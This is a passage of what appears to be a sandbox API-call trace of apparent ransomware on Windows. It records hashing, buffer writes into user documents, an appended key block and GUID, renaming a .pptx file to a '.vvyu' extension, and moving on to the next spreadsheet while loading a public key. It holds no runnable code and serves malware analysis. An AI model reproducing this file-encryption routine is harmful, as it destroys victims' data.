hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.352] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.352] GetLastError () returned 0x0 [0189.353] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.353] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.353] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.353] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.353] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xcbe0) returned 0x2af5168 [0189.354] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2c38 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2c80 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.355] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db38 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0db20 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.357] GetCurrentThreadId () returned 0x5d8 [0189.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4458 [0189.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.358] GetCurrentThreadId () returned 0x5d8 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db38 [0189.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db98 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbb0 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db50 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db20 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2c80 | out: hHeap=0x2c0000) returned 1 [0189.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.369] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xcbd2, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xcbd2, lpOverlapped=0x0) returned 1 [0189.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.370] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcbd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.370] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.371] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.371] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.371] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.372] CloseHandle (hObject=0x584) returned 1 [0189.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.373] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\riNXJCPkFg.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\rinxjcpkfg.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\riNXJCPkFg.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\rinxjcpkfg.pptx.vvyu")) returned 1 [0189.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.375] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.378] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2df1960, ftCreationTime.dwHighDateTime=0x1d897e2, ftLastAccessTime.dwLowDateTime=0x5ab20d50, ftLastAccessTime.dwHighDateTime=0x1d8a219, ftLastWriteTime.dwLowDateTime=0x5ab20d50, ftLastWriteTime.dwHighDateTime=0x1d8a219, nFileSizeHigh=0x0, nFileSizeLow=0xc41c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RN1rbBo1eqYMG_Q.xlsx", cAlternateFileName="RN1RBB~1.XLS")) returned 1 [0189.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2c80 [0189.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0189.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2c80 | out: hHeap=0x2c0000) returned 1 [0189.378] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\RN1rbBo1eqYMG_Q.xlsx") returned=".xlsx" [0189.378] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RN1rbBo1eqYMG_Q.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\rn1rbbo1eqymg_q.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.380] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=50204) returned 1 [0189.380] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.384] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc3f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.386] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.388] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.388] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xc41c, lpOverlapped=0x0) returned 1 [0189.389] lstrlenA (lpString="-----BEGIN PUBLIC 